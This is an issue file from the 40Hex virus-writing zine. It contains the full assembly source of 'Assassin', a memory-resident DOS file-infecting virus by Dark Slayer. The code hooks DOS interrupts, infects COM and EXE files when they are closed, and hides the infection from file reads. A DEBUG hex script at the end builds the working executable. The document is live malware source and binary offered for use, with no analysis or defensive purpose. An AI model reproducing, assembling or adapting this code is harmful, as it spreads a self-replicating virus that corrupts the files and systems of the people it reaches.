40Hex Number 14 Volume 5 Issue 1 File 004 ; Assassin (Bug Fix version) ; by Dark Slayer mem_size equ offset memory_end-offset start mem_para equ (mem_size+0fh)/10h low_mem_size equ mem_size+100h low_mem_para equ (low_mem_size+0fh)/10h vir_size equ offset vir_end-offset start vir_sector equ (vir_size+1ffh+2)/200h constant_size equ offset constant-offset start .model tiny .code org 0 start: xor di,di mov dx,ds:[di+2] sub dh,5 mov ah,26h int 21h mov bp,ds:[di+2ch] mov ah,4ah mov bx,low_mem_para int 21h mov ah,52h int 21h mov bx,es:[bx-2] mov ax,cs dec ax mcb: mov cx,ds mov ds,bx inc bx mov dx,bx add bx,ds:[di+3] or bp,bp jnz not_boot cmp ax,bx jne not_our_mcb add word ptr ds:[di+3],low_mem_para+1 not_our_mcb: cmp ax,cx jne not_boot mov ds:[di+1],dx mov di,8 push ds pop es mov si,di mov ds,ax mov cx,di rep movsb push dx add ax,10h+1 push ax jmp short search not_boot: cmp byte ptr ds:[di],4dh je mcb cmp byte ptr ds:[di],5ah je mcb mov sp,low_mem_size sub dx,mem_para+1 mov es,dx sub dx,cx dec dx mov ds,cx mov ds:[di+3],dx mov si,100h mov cx,vir_size rep movs byte ptr es:[di],cs:[si] push es search: mov ax,352ah int 21h pop ds push ds mov di,offset i21_table mov ds:old2a[di]-i21_table,bx mov ds:old2a[di+2]-i21_table,es mov ah,25h mov dx,offset int2a int 21h mov dx,bx push es pop ds int 21h pop es lds si,es:[di] search_table: lodsw search_table_: dec si cmp ax,8b2eh jne search_table lodsw cmp ah,9fh jne search_table_ movsw scasw lea ax,[si-1e0h] stosw xchg si,ax mov word ptr ds:[si],0eacbh mov word ptr ds:[si+2],offset i21_3e mov ds:[si+4],es mov byte ptr ds:[si+6],0eah mov word ptr ds:[si+7],offset i21_3f mov ds:[si+9],es call set21 mov cx,bp jcxz boot mov ds,bp xor si,si l2: lodsw dec si or ax,ax jnz l2 lea dx,[si+3] mov di,offset pcb+4+100h push cs pop es mov ax,cs stosw scasw stosw scasw stosw mov ax,4b00h mov bx,offset pcb+100h int 21h mov ah,4dh int 21h mov ah,4ch int 21h boot: pop dx mov ah,26h int 21h mov bl,3 mov ss:[bp+18h+5],bl mov ax,1216h int 2fh inc bp mov es:[di],bp mov ss,dx mov ds,dx mov ax,4200h mov bl,5 cwd int 21h mov ah,3fh dec cx inc dh int 21h mov ah,3eh int 21h push ds pop es push ds push dx retf read_cmp proc mov cx,vir_size mov dx,cx push cs pop ds call read jc rc_exit push cx xor si,si if (vir_size and 0ff00h) eq (constant_size and 0ff00h) mov cl,constant_size and 0ffh else mov cx,constant_size endif compare: lodsb cmp al,ds:read_buffer[si-1] loope compare clc pop cx rc_exit: ret read_cmp endp read proc push bx push dx push ds mov ax,1229h int 2fh pop ds pop dx pop bx ret read endp write proc mov bp,40h*2 i21_func proc pop ax push bx push cs push ax push cs pop ds push ds:i21_far_jmp les di,dword ptr ds:i21_table push es push es:[di+bp] retf i21_func endp write endp set2324_restore21 proc push ds mov si,23h*4 xor ax,ax mov ds,ax mov di,offset old23 push cs pop es mov ax,offset int23 mov bp,2 sm_23_1: movsw mov ds:[si-2],ax movsw mov ds:[si-2],cs if ((int23-start) and 0ff00h) eq ((int24-start) and 0ff00h) mov al,(offset int24-offset start) and 0ffh else mov ax,offset int24 endif dec bp jnz sm_23_1 mov si,di push cs pop ds mov bp,-4 rs_1: inc bp inc bp les di,dword ptr ds:i21_table mov di,es:[di+bp+2+3eh*2] movsb movsw jnz rs_1 pop ds pop bp pop ax push es push ax get_sft proc push bx mov ax,1220h int 2fh mov bl,es:[di] mov ax,1216h int 2fh pop bx jmp bp get_sft endp set2324_restore21 endp set21_restore23 proc mov si,offset old23 push cs pop ds mov di,23h*4 xor cx,cx mov es,cx mov cl,4 rep movsw push cs pop es set21 proc ; es = vir segment push ax mov bx,-4 mov di,offset i21_3e_data mov cx,es:i21_far_jmp[di]-i21_3e_data inc cx sm_1: inc bx lds si,dword ptr es:i21_table mov ax,ds:[si+bx+3+3eh*2] mov si,ax movsb movsw xchg si,ax sub ax,cx neg ax mov byte ptr ds:[si],0e9h mov ds:[si+1],ax add cx,5 inc bx jnz sm_1 pop ax ret set21 endp set21_restore23 endp i21_3e: call set2324_restore21 jc jc_exit push es pop ds cmp word ptr ds:[di],1 jne jne_exit les ax,dword ptr ds:[di+28h] mov dx,es cmp ax,'OC' jne exe mov al,'M' jmp short com exe: cmp ax,'XE' jne jne_exit com: cmp dl,al jne_exit: jne jne_exit_ les ax,dword ptr ds:[di+11h] cmp ax,vir_size jc_exit: jb jc_exit_ cmp ax,0ffffh-(vir_size+2) ja jne_exit_ mov dx,es or dx,dx jne_exit_: jnz i21_3e_exit mov ds:[di+15h],dx mov ds:[di+17h],dx les si,dword ptr ds:[di+7] les si,dword ptr es:[si+2] add ax,si dec ax div si mov cx,es inc cx div cl or ah,ah jz i21_3e_exit sub cl,ah cmp cl,vir_sector jc_exit_: jb i21_3e_exit les ax,ds:[di+4] push ax push es and ax,1000000000011100b jnz close_ mov byte ptr ds:[di+2],2 mov ds:[di+4],al call read_cmp jbe close mov si,cx cmp_device: dec si lodsw inc ax loopnz cmp_device jcxz not_device dec ax cmp ax,ds:[si] je close jmp short cmp_device not_device: mov ax,es:[di+11h] mov es:[di+15h],ax mov cx,vir_size+2 mov dx,offset id call write pop bx jc close sub es:[di+11h],ax dec cx dec cx cwd mov es:[di+15h],dx call write pop bx close: push es pop ds close_: pop ds:[di+6] pop ds:[di+4] mov bp,0dh*2 call i21_func pop bx i21_3e_exit: mov ax,1227h int 2fh jmp i21_3f_exit i21_3f: call set2324_restore21 les ax,dword ptr es:[di+15h] push ax push es call read pop bp pop si cmc jnc jnc_exit test word ptr es:[di+4],1000000000011000b jnz jnz_3f_exit or bp,bp jnz_3f_exit: jnz i21_3f_exit sub si,vir_size jnc_exit: jae i21_3f_exit xor cx,cx xchg cx,es:[di+15h] push cx xor cx,cx xchg cx,es:[di+17h] push cx push ax push si push dx push ds call read_cmp pop ds pop dx jc i21_3f_exit_1 jne i21_3f_exit_1 push dx push ds push es pop ds mov ax,ds:[di+11h] mov ds:[di+15h],ax add word ptr ds:[di+11h],vir_size+2 mov cl,2 mov dx,offset read_buffer push cs pop ds call read pop ds pop dx jc i21_3f_exit_2 cmp word ptr cs:read_buffer,'SD' je i21_3f_l0 mov ax,1218h int 2fh or byte ptr ds:[si+16h],1 jmp short i21_3f_exit_2 i21_3f_l0: pop si neg si mov ax,es:[di+11h] sub ax,si mov es:[di+15h],ax pop cx push cx push cx cmp cx,si jb i21_3f_l1 mov cx,si i21_3f_l1: call read i21_3f_exit_2: sub word ptr es:[di+11h],vir_size+2 i21_3f_exit_1: pop ax pop ax pop es:[di+17h] pop es:[di+15h] i21_3f_exit: call set21_restore23 push ax mov ax,1218h int 2fh mov ax,ds:[si+16h] shr ax,1 pop ax mov ds:[si],ax retf int23: call set21_restore23 jmp dword ptr cs:old23 int24: xor ax,ax iret int2a: pop cs:i21_table pop cs:i21_table[2] sub sp,4 jmp dword ptr cs:old2a msg db ' This is [Assassin] written by Dark Slayer ' db 'in Keelung. Taiwan ' constant: pcb dw 0,80h,?,5ch,?,6ch,? id db 'DS' vir_end: read_buffer db vir_size dup(?) old2a dw ?,? old23 dw ?,? old24 dw ?,? i21_3e_data db 3 dup(?) i21_3f_data db 3 dup(?) i21_table dw ?,? i21_far_jmp dw ? memory_end: end start ---------------------- N assassin.com E 0100 33 FF 8B 55 02 80 EE 05 B4 26 CD 21 8B 6D 2C B4 E 0110 4A BB 8A 00 CD 21 B4 52 CD 21 26 8B 5F FE 8C C8 E 0120 48 8C D9 8E DB 43 8B D3 03 5D 03 0B ED 75 24 3B E 0130 C3 75 05 81 45 03 8B 00 3B C1 75 17 89 55 01 BF E 0140 08 00 1E 07 8B F7 8E D8 8B CF F3 A4 52 05 11 00 E 0150 50 EB 24 80 3D 4D 74 C9 80 3D 5A 74 C4 BC 95 08 E 0160 83 EA 7B 8E C2 2B D1 4A 8E D9 89 55 03 BE 00 01 E 0170 B9 BF 03 F3 2E A4 06 B8 2A 35 CD 21 1F 1E BF 8F E 0180 07 89 5D EE 8C 45 F0 B4 25 BA 57 03 CD 21 8B D3 E 0190 06 1F CD 21 07 26 C5 35 AD 4E 3D 2E 8B 75 F9 AD E 01A0 80 FC 9F 75 F4 A5 AF 8D 84 20 FE AB 96 C7 04 CB E 01B0 EA C7 44 02 EA 01 8C 44 04 C6 44 06 EA C7 44 07 E 01C0 A2 02 8C 44 09 E8 F6 00 8B CD E3 29 8E DD 33 F6 E 01D0 AD 4E 0B C0 75 FA 8D 54 03 BF B3 04 0E 07 8C C8 E 01E0 AB AF AB AF AB B8 00 4B BB AF 04 CD 21 B4 4D CD E 01F0 21 B4 4C CD 21 5A B4 26 CD 21 B3 03 88 5E 1D B8 E 0200 16 12 CD 2F 45 26 89 2D 8E D2 8E DA B8 00 42 B3 E 0210 05 99 CD 21 B4 3F 49 FE C6 CD 21 B4 3E CD 21 1E E 0220 07 1E 52 CB B9 BF 03 8B D1 0E 1F E8 11 00 72 0E E 0230 51 33 F6 B1 AF AC 3A 84 BE 03 E1 F9 F8 59 C3 53 E 0240 52 1E B8 29 12 CD 2F 1F 5A 5B C3 BD 80 00 58 53 E 0250 0E 50 0E 1F FF 36 93 07 C4 3E 8F 07 06 26 FF 33 E 0260 CB 1E BE 8C 00 33 C0 8E D8 BF 81 07 0E 07 B8 4C E 0270 03 BD 02 00 A5 89 44 FE A5 8C 4C FE B0 54 4D 75 E 0280 F3 8B F7 0E 1F BD FC FF 45 45 C4 3E 8F 07 26 8B E 0290 7B 7E A4 A5 75 F2 1F 5D 58 06 50 53 B8 20 12 CD E 02A0 2F 26 8A 1D B8 16 12 CD 2F 5B FF E5 BE 81 07 0E E 02B0 1F BF 8C 00 33 C9 8E C1 B1 04 F3 A5 0E 07 50 BB E 02C0 FC FF BF 89 07 26 8B 4D 0A 41 43 26 C5 36 8F 07 E 02D0 8B 40 7F 8B F0 A4 A5 96 2B C1 F7 D8 C6 04 E9 89 E 02E0 44 01 83 C1 05 43 75 E2 58 C3 E8 74 FF 72 24 06 E 02F0 1F 83 3D 01 75 15 C4 45 28 8C C2 3D 43 4F 75 04 E 0300 B0 4D EB 05 3D 45 58 75 02 3A D0 75 11 C4 45 11 E 0310 3D BF 03 72 2B 3D 3E FC 77 04 8C C2 0B D2 75 7A E 0320 89 55 15 89 55 17 C4 75 07 26 C4 74 02 03 C6 48 E 0330 F7 F6 8C C1 41 F6 F1 0A E4 74 5F 2A CC 80 F9 02 E 0340 72 58 C4 45 04 50 06 25 1C 80 75 41 C6 45 02 02 E 0350 88 45 04 E8 CE FE 76 33 8B F1 4E AD 40 E0 FB E3 E 0360 07 48 3B 04 74 25 EB F2 26 8B 45 11 26 89 45 15 E 0370 B9 C1 03 BA BD 03 E8 D2 FE 5B 72 0F 26 29 45 11 E 0380 49 49 99 26 89 55 15 E8 C1 FE 5B 06 1F 8F 45 06 E 0390 8F 45 04 BD 1A 00 E8 B5 FE 5B B8 27 12 CD 2F E9 E 03A0 98 00 E8 BC FE 26 C4 45 15 50 06 E8 91 FE 5D 5E E 03B0 F5 73 10 26 F7 45 04 18 80 75 02 0B ED 75 7B 81 E 03C0 EE BF 03 73 75 33 C9 26 87 4D 15 51 33 C9 26 87 E 03D0 4D 17 51 50 56 52 1E E8 4A FE 1F 5A 72 52 75 50 E 03E0 52 1E 06 1F 8B 45 11 89 45 15 81 45 11 C1 03 B1 E 03F0 02 BA BF 03 0E 1F E8 46 FE 1F 5A 72 2D 2E 81 3E E 0400 BF 03 44 53 74 0B B8 18 12 CD 2F 80 4C 16 01 EB E 0410 19 5E F7 DE 26 8B 45 11 2B C6 26 89 45 15 59 51 E 0420 51 3B CE 72 02 8B CE E8 15 FE 26 81 6D 11 C1 03 E 0430 58 58 26 8F 45 17 26 8F 45 15 E8 6F FE 50 B8 18 E 0440 12 CD 2F 8B 44 16 D1 E8 58 89 04 CB E8 5D FE 2E E 0450 FF 2E 81 07 33 C0 CF 2E 8F 06 8F 07 2E 8F 06 91 E 0460 07 83 EC 04 2E FF 2E 7D 07 20 54 68 69 73 20 69 E 0470 73 20 5B 41 73 73 61 73 73 69 6E 5D 20 77 72 69 E 0480 74 74 65 6E 20 62 79 20 44 61 72 6B 20 53 6C 61 E 0490 79 65 72 20 69 6E 20 4B 65 65 6C 75 6E 67 2E 20 E 04A0 54 61 69 77 61 6E 20 3C 52 2E 4F 2E 43 3E 20 00 E 04B0 00 80 00 00 00 5C 00 00 00 6C 00 00 00 44 53 R CX 03BF W Q ----------------------